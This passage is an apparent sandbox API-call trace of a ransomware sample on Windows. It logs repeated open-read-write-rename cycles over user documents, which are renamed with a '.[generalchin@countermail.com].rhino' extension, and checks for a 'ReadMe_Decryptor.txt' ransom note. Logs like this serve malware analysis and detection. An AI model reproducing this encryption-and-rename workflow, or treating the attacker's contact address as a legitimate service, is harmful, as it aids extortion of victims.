[0107.262] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0107.262] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0107.262] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0107.262] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0107.262] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711d10 [0107.262] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0107.262] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0ac8 [0107.262] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.262] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0107.262] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.262] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7148e0 [0107.262] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0107.262] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714978 [0107.262] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.262] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x712290 [0107.262] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0107.263] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7148e0 [0107.263] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.263] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0107.263] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.263] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0107.263] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0107.263] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0107.263] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.263] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b32b8 [0107.263] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0107.263] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0107.263] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b32b8 | out: hHeap=0x6d0000) returned 1 [0107.263] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23b32b8 [0107.263] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.263] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23b47f8 [0107.263] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b32b8 | out: hHeap=0x6d0000) returned 1 [0107.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23b67c0 [0107.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b47f8 | out: hHeap=0x6d0000) returned 1 [0107.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23f16b8 [0107.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b67c0 | out: hHeap=0x6d0000) returned 1 [0107.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23b32b8 [0107.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0107.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x240ee40 [0107.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b32b8 | out: hHeap=0x6d0000) returned 1 [0107.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x24c0050 [0107.267] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x240ee40 | out: hHeap=0x6d0000) returned 1 [0107.268] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x24cf088 [0107.321] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24c0050 | out: hHeap=0x6d0000) returned 1 [0107.321] WriteFile (in: hFile=0x294, lpBuffer=0x24cf0a0*, nNumberOfBytesToWrite=0xfec2, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x24cf0a0*, lpNumberOfBytesWritten=0x292f304*=0xfec2, lpOverlapped=0x0) returned 1 [0107.322] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24cf088 | out: hHeap=0x6d0000) returned 1 [0107.322] UnlockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xfec2, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.322] CloseHandle (hObject=0x294) returned 1 [0107.324] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23bc208 [0107.324] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7148e0 [0107.324] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.324] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\ttIR1y8rGjuXrKO.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\ttir1y8rgjuxrko.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\ttIR1y8rGjuXrKO.odt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\ttir1y8rgjuxrko.odt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0107.325] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.325] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.325] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: hHeap=0x6d0000) returned 1 [0107.329] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3c38 [0107.329] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3b90 | out: hHeap=0x6d0000) returned 1 [0107.329] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3b90 [0107.329] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x712898 [0107.329] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3b90 | out: hHeap=0x6d0000) returned 1 [0107.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0107.329] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\zMuEM6hwu.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\zmuem6hwu.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0107.329] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x51bf [0107.329] LockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x52df, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.329] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.330] ReadFile (in: hFile=0x294, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.331] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.331] ReadFile (in: hFile=0x294, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x51bf, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x51bf, lpOverlapped=0x0) returned 1 [0107.331] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.331] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.331] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711d10 [0107.331] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0ac8 [0107.332] GetLastError () returned 0x0 [0107.332] SetLastError (dwErrCode=0x0) [0107.332] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.332] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x51e2) returned 0x23b32b8 [0107.332] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.332] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0750 [0107.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0107.333] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0750 | out: hHeap=0x6d0000) returned 1 [0107.333] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713830 [0107.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713820 [0107.333] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713830 [0107.333] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0107.333] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713830 [0107.333] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757ef8 [0107.333] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757f58 [0107.333] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0107.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0107.333] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f58 | out: hHeap=0x6d0000) returned 1 [0107.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0107.333] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0107.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711d10 [0107.333] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0107.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0ac8 [0107.333] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0107.334] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.334] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7148e0 [0107.334] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0107.334] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714978 [0107.334] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.334] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x712290 [0107.334] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0107.334] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7148e0 [0107.334] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.334] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0107.334] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.334] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0107.334] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0107.334] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0107.334] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.334] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b84a8 [0107.334] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0107.334] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0107.334] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b84a8 | out: hHeap=0x6d0000) returned 1 [0107.334] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23b84a8 [0107.335] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.335] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23f16b8 [0107.335] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b84a8 | out: hHeap=0x6d0000) returned 1 [0107.338] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23f3680 [0107.339] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0107.339] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23f6618 [0107.339] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f3680 | out: hHeap=0x6d0000) returned 1 [0107.339] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23ff070 [0107.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f6618 | out: hHeap=0x6d0000) returned 1 [0107.340] WriteFile (in: hFile=0x294, lpBuffer=0x23ff080*, nNumberOfBytesToWrite=0x52df, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x23ff080*, lpNumberOfBytesWritten=0x292f304*=0x52df, lpOverlapped=0x0) returned 1 [0107.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: hHeap=0x6d0000) returned 1 [0107.340] UnlockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x52df, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.340] CloseHandle (hObject=0x294) returned 1 [0107.342] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9ee8 [0107.342] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x7148e0 [0107.342] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9ee8 | out: hHeap=0x6d0000) returned 1 [0107.342] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\zMuEM6hwu.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\zmuem6hwu.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\zMuEM6hwu.ppt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\zmuem6hwu.ppt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0107.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b32b8 | out: hHeap=0x6d0000) returned 1 [0107.343] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3b90 [0107.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3c38 | out: hHeap=0x6d0000) returned 1 [0107.343] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3c38 [0107.343] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x712898 [0107.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3c38 | out: hHeap=0x6d0000) returned 1 [0107.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0107.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\kze0OTs\\52FjfcR9Co.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\kze0ots\\52fjfcr9co.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0107.344] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x16aeb [0107.344] LockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x16c0b, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.344] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.344] ReadFile (in: hFile=0x294, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.345] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.345] ReadFile (in: hFile=0x294, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x16aeb, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x16aeb, lpOverlapped=0x0) returned 1 [0107.346] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.346] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.346] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711d10 [0107.346] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0ac8 [0107.346] GetLastError () returned 0x0 [0107.346] SetLastError (dwErrCode=0x0) [0107.346] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.346] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16b0e) returned 0x23ff070 [0107.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0750 [0107.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0107.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0750 | out: hHeap=0x6d0000) returned 1 [0107.348] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713830 [0107.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713820 [0107.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713830 [0107.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0107.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713830 [0107.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757f58 [0107.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757ef8 [0107.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f58 | out: hHeap=0x6d0000) returned 1 [0107.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0107.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0107.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0107.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0107.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711d10 [0107.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0107.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0ac8 [0107.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0107.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0107.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7148e0 [0107.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0107.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714978 [0107.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x712290 [0107.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0107.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7148e0 [0107.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0107.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.349] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0107.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0107.349] RtlAllocateHeap 